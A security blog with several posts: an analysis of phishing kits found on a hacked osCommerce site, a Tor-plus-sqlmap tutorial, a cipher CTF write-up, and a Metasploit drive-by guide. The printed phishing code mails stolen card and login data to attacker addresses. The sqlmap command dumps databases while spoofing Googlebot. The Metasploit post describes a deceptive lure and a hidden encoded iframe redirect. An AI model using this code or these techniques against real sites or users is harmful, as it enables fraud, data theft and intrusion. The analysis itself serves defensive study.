hacked pages and spam

Another day goes by another guy reports a hacked website. This time with new spam scripts. The vulnerable web site was running an old version of osCommerce and the attackers were quite a few in the last days. What was added to the site mainly was phising templates for AoL, BofA, and others. Interestingly there is a website referred to most of the scripts, the site is http://maroc-spam.net with really bad work on the web template there guys if you are making phising sites and you promote yours in there make a better work at least.

Looking at the AoL ( http://www.deventum.com/research/Aol.zip ) files we can find information about the card that they support on their phising, eg,

cards [0] = {name: "Visa",
             length: "13,16",
             prefixes: "4",
             checkdigit: true};
cards [1] = {name: "MasterCard",
             length: "16",
             prefixes: "51,52,53,54,55",
             checkdigit: true};
cards [2] = {name: "DinersClub",
             length: "14,16",
             prefixes: "300,301,302,303,304,305,36,38,55",
             checkdigit: true};
cards [3] = {name: "CarteBlanche",
             length: "14",
             prefixes: "300,301,302,303,304,305,36,38",
             checkdigit: true};
cards [4] = {name: "AmEx",
             length: "15",
             prefixes: "34,37",
             checkdigit: true};
cards [5] = {name: "Discover",
             length: "16",
             prefixes: "6011,650",
             checkdigit: true};
cards [6] = {name: "JCB",
             length: "15,16",
             prefixes: "3,1800,2131",
             checkdigit: true};
cards [7] = {name: "enRoute",
             length: "15",
             prefixes: "2014,2149",
             checkdigit: true};
cards [8] = {name: "Solo",
             length: "16,18,19",
             prefixes: "6334, 6767",
             checkdigit: true};
cards [9] = {name: "Switch",
             length: "16,18,19",
             prefixes: "4903,4905,4911,4936,564182,633110,6333,6759",
             checkdigit: true};
cards [10] = {name: "Maestro",
             length: "16,18",
             prefixes: "5020,6",
             checkdigit: true};
cards [11] = {name: "VisaElectron",
             length: "16",
             prefixes: "417500,4917,4913",
             checkdigit: true};

Only one file is encoded using base64 encoding and the decoded output contains, the mail where the information are sent, this is defined as : $mail ="golobaz@voila.fr";

Another directory with the name www.poste.it has phising information about poste.it website. Again there is only one encoded file containing information about the recipient of the details gathered,

$usip = $_SERVER['REMOTE_ADDR'];
$mail = "golobaz@voila.fr";
$subj = "Posteitaliane Utente ";

An interesting script that seems to be specifically created for osCommerce applications since it’s gathering data from configuration files and database is Thumbs.db.php, ( http://www.deventum.com/research/Thumbs.db.php.gz )

More scripts, slq.php file, ( http://www.deventum.com/research/slq.php.gz ) is an interface for mysql or as it’s described “MySQL Interface (Developed By Mohajer22)” with embedded username and password set to :

$PASSWORD = "root_xhahax";
$USERNAME = "xhahax";

Another php web shell “ Web Shell by oRb” under the name of account_manage.php that it is a modified version of c99 shell scripts with a slightly better interface.

The usual scripts for mass mailing, this time “ Made By Mo$`Craci|a` “ , one more backdoor on the site with the name cookie_usage.php that enables an attacker to post a crafted request and login as administrator on the system.

The Bofa, “Bank of America” phising template is sending the information gathered to the following address,

$send="latesayee800@blumail.org";
$subject = "Fresh BOFA Rezult | $user | $ip";
$headers = "From: alsa7r >";

Also inside style.css we have

<?
$IP = 'm4rk0l30p4rd@yahoo.com,m4rk0l30p4rd@hotmail.com';
?>

And finally a phising template for www.caisse-epargne.fr which under confirm_fichiers/ScriptResource_013.axd again on base64 encoding contains the following:

$message  = "-----------------------------------------\n";
$message .= "--------------+ Login Info +-------------\n";
$message .= "-----------------------------------------\n";
$message .= "Nom complet : ".$_POST['ctl09$CC_sous_ouv_direct_ecureuil$ccSousCivilite$CC_sous_civilite_bloc$wzdCivilite$tbPrenom']." ".$_POST['ctl09$CC_sous_ouv_direct_ecureuil$ccSousCivilite$CC_sous_civilite_bloc$wzdCivilite$tbNom']."\n";
$message .= "Identifiant Client : ".$_POST['ctl09$CC_sous_ouv_direct_ecureuil$ccSousCivilite$CC_sous_civilite_bloc$wzdCivilite$tbInternaute']."\n";
$message .= "Date de naiscance : ".$_POST['ctl09$CC_sous_ouv_direct_ecureuil$ccSousCivilite$CC_sous_civilite_bloc$wzdCivilite$tbDateNaissance']."\n"; include 'confirm_fichiers/ScriptResource_012.axd';
$message .= "Email : ".$_POST['ctl09$CC_sous_ouv_direct_ecureuil$ccSousCivilite$CC_sous_civilite_bloc$wzdCivilite$tbEmail']."\n";
$message .= "-----------------------------------------\n";
$message .= "Adresse : ".$_POST['ctl09$CC_sous_ouv_direct_ecureuil$ccSousCoordonneesPostales$CC_sous_coordonnees_postales_bloc$wzdCoordonneesPostales$tbAdresse']."\n";
$message .= "ville : ".$_POST['ctl09$CC_sous_ouv_direct_ecureuil$ccSousCoordonneesPostales$CC_sous_coordonnees_postales_bloc$wzdCoordonneesPostales$tbVille']."\n";
$message .= "code postal : ".$_POST['ctl09$CC_sous_ouv_direct_ecureuil$ccSousCoordonneesPostales$CC_sous_coordonnees_postales_bloc$wzdCoordonneesPostales$tbCP']."\n";
$message .= "-----------------------------------------\n";
$message .= "CC number : ".$_POST['ctl09$CC_sous_ouv_direct_ecureuil$ccSousCallBack$CC_sous_call_back_bloc$wzdCallBack$tbTelephoneBureau']."\n";
$message .= "exp date : ".$_POST['ctl09$CC_sous_ouv_direct_ecureuil$ccSousCallBack$CC_sous_call_back_bloc$wzdCallBack$tbTelephoneMobile']."\n";
$message .= "cvv : ".$_POST['ctl09$CC_sous_ouv_direct_ecureuil$ccSousCallBack$CC_sous_call_back_bloc$wzdCallBack$tbTelephone']."\n";
$message .= "-----------------------------------------\n";
$message .= "--------------+ Made By REDHATTeam +------------\n";
$message .= "--------------+ Thnx My Redhatteam +------------\n";
$message .= "-----------------------------------------\n";

$send="golobaz@voila.fr";

$subject = "Bravo | $login";

$headers = "From: REdhatteam - maroc-spam.net";

mail($send,$subject,$message,$headers);

header("Location: https://www.caisse-epargne.fr/pauth.aspx?");

sqlmap and tor

There is no better tool at the moment for blind SQL injection than sqlmap. If you don’t use it you should definitely have a look on it. With the latest additions sqlmap supports tor with a command line switch, –tor. Let’s proceed with an installation. My system is debian/ubuntu based but the installation is almost the same for any unix based distribution. Following the instructions, https://www.torproject.org/docs/debian.html.en#ubuntu ,

Add this line to your /etc/apt/sources.list file:

deb     http://deb.torproject.org/torproject.org <DISTRIBUTION> main

where you put the codename of your distribution (i.e. lenny, sid, maverick or whatever it is) in place of <DISTRIBUTION>.

Then add the gpg key used to sign the packages by running the following commands at your command prompt:

gpg --keyserver keys.gnupg.net --recv 886DDD89
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -

Now refresh your sources and install Tor by running the following commands (as root) at your command prompt:

apt-get update
apt-get install tor tor-geoipdb

Start tor, with /etc/init.d/tor start and grab a copy of polito config file from https://gitweb.torproject.org/torbrowser.git/blob_plain/HEAD:/build-scripts/config/polipo.conf , rename or move the old file in /etc/polipo/config and use the configuration from the URL.Restart polipo with /etc/init.d/polipo restart.

Get sqlmap from the latest svn trunk using

svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap

Now you can use sqlmap with –tor with the following command,

~/sqlmap# ./sqlmap.py -u http://URL/index.php?cata_id=1 --dump-all –tor --user-agent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" and your requests will appear like an anonymous google bot getting information from the website.

another ctf from novaha

A crypto ctf this time from NoVA great group. This time the challenge was a to decipher a text. The give text was the following,

Cipher text:

NDJJE ETD’RF Y NTE ZYHF Y NUA PTUBF
KIYEUP’ UP WGF BWRFFW ATPPY NF Y NUA ZYP BTZF JYE

ETD ATW ZDJ TP ET’ XYVF
ETD NUA JUBARYVF
HUVHUP’ ETDR VYP YII TSFR WGF KIYVF

MF MUII MF MUII RTVH ETD
MF MUII MF MUII RTVH ETD

NDJJE ETD’RF Y ETDPA ZYP GYRJ ZYP
BGTDWUP’ UP WGF BWRFFW ATPPY WYHF TP WGF MTRIJ BTZF JYE
ETD ATW NITTJ TP ET’ XYVF
ETD NUA JUBARYVF
MYSUP’ ETDR NYPPFR YII TSFR WGF KIYVF

MF MUII MF MUII RTVH ETD
MF MUII MF MUII RTVH ETD

NDJJE ETD’RF YP TIJ ZYP KTTR ZYP
KIFYJUP’ MUWG ETDR FEFB ATPPY ZYHF ETD BTZF KFYVF BTZF JYE

ETD ATW ZDJ TP ETDR XYVF
ETD NUA JUBARYVF
BTZFNTJE NFWWFR KDW ETD NYVH UP ETDR KIYVF

MF MUII MF MUII RTVH ETD
MF MUII MF MUII RTVH ETD

The challenge this time was easy since at the website the author provided a lot of information about substitution ciphers and also a nice tool to measure the occurrences of each letter. The link for the tool is, http://novactf.org/challenges/challenge-march-2011/rubyscript/ and the output on the text above is the following,

[A => 15]       2.94%
[B => 13]       2.54%
[D => 30]       5.87%
[E => 35]       6.85%
[F => 53]       10.37%
[G => 8]        1.57%
[H => 12]       2.35%
[I => 36]       7.05%
[J => 20]       3.91%
[K => 8]        1.57%
[M => 27]       5.28%
[N => 15]       2.94%
[P => 29]       5.68%
[R => 26]       5.09%
[S => 3]        0.59%
[T => 58]       11.35%
[U => 31]       6.07%
[V => 19]       3.72%
[W => 18]       3.52%
[X => 3]        0.59%
[Y => 38]       7.44%
[Z => 14]       2.74%

From http://en.wikipedia.org/wiki/Letter_frequency. We can assume, based on the frequency of possible occurrences for a start, that letters T and or F on the cipher text are one of the following e, t, a, or o. Since the author of the challenge already describe that he kept punctuation and format of the original text we can try to substitute using sed T and F accordingly. I won’t take this long this was an easy challenge, there are not many common words in English that have 2 letters and the second is e. That comes by substituting F with e, also we have the pattern MF MUII MF MUII RTVH ETD the second word, MUII has 2 occurrences of the same letters at the end, we can look for that at, http://www.morewords.com . Keeping it sort,  

cat text  | sed s/F/e/g | sed s/T/o/g | sed s/M/w/g | sed s/I/l/g | sed s/U/i/g | sed s/R/r/g | sed s/V/c/g | sed s/H/k/g | sed s/E/y/g | sed s/D/u/g

will result on the following,

NuJJy youY Noy ZYke Y NiA PoiBe
KlYyiP WGe BWreeW AoPPY Ne Y NiA ZYP BoZe JYy

you AoW ZuJ oP yoce
you NiA JiBArYce
kickiPur cYP Yll oSer WGe KlYce

we will we will rock you
we will we will rock you

NuJJy youY youPA ZYP GYrJ ZYP
BGouWiP WGe BWreeW AoPPY WYke oP WGe worlJ BoZe JYy
you AoW NlooJ oP yoce
you NiA JiBArYce
wYSiPur NYPPer Yll oSer WGe KlYce

we will we will rock you
we will we will rock you

NuJJy youYP olJ ZYP Koor ZYP
KleYJiPWG your eyeB AoPPY ZYke you BoZe KeYce BoZe JYy

you AoW ZuJ oP your XYce
you NiA JiBArYce
BoZeNoJy NeWWer KuW you NYck iP your KlYce

we will we will rock you
we will we will rock you

I believe we don’t need more than that, we will rock you by Queen (http://www.lyrics007.com/Queen%20Lyrics/We%20Will%20Rock%20You%20Lyrics.html) .

Client site attack using java codebase trust

Some times you have to play the bad guy card in order to achieve results. When XSS attacks are not helping you to redirect a victim to your exploit, during a pentest, a more indirect approach can do the trick. Using a normal legitimate URL to do your bits. The latest exploit module for java_codebase_trust from metasploit is ideal for such attacks.  The setup, one domain, any dyndns service or simply a short/tiny url service. These days i prefer a normal domain name, dyndns services and tiny url addresses don't sound so legit for someone to trust. Another idea is a notification for newsletter removal, nobody likes unwanted newsletters, so a removal link is highly appreciated many times.

Our metasploit server, running on msfconsole with the following settings,

I prefer to use local port on 443 for the metasploit listener, since many firewalls won't even check if the traffic is actual https, they will just check the port number and allow the traffic. As for the payload the normal java meterpreter is sufficient and goes undetected on many antiviruses still now.

Adding a backdoor that will redirect a client from the website to the metasploit server can be done with the use of an iframe embedded on the actual html code of our site. Using an encoder also like, http://www.htmlguard.com/articles/wp-content/uploads/html-encryption.html we can encode our actual address to make it a bit harder on the first look to raise suspicion. In our case a redirect to the server with ip address 192.168.2.23 can be encoded ,

and from the options my favorite encoding is base64,

Adding html tags to the code, the following line can be inserted on any html/php file on our website.

What will happen is, that when some user will go to look on our website he will be redirected also with no warning or any other notice to the metasploit server running the java_codebase_trust exploit on ip address 192.168.2.23. If the client will be running a vulnerable java version we will have a meterpreter connection.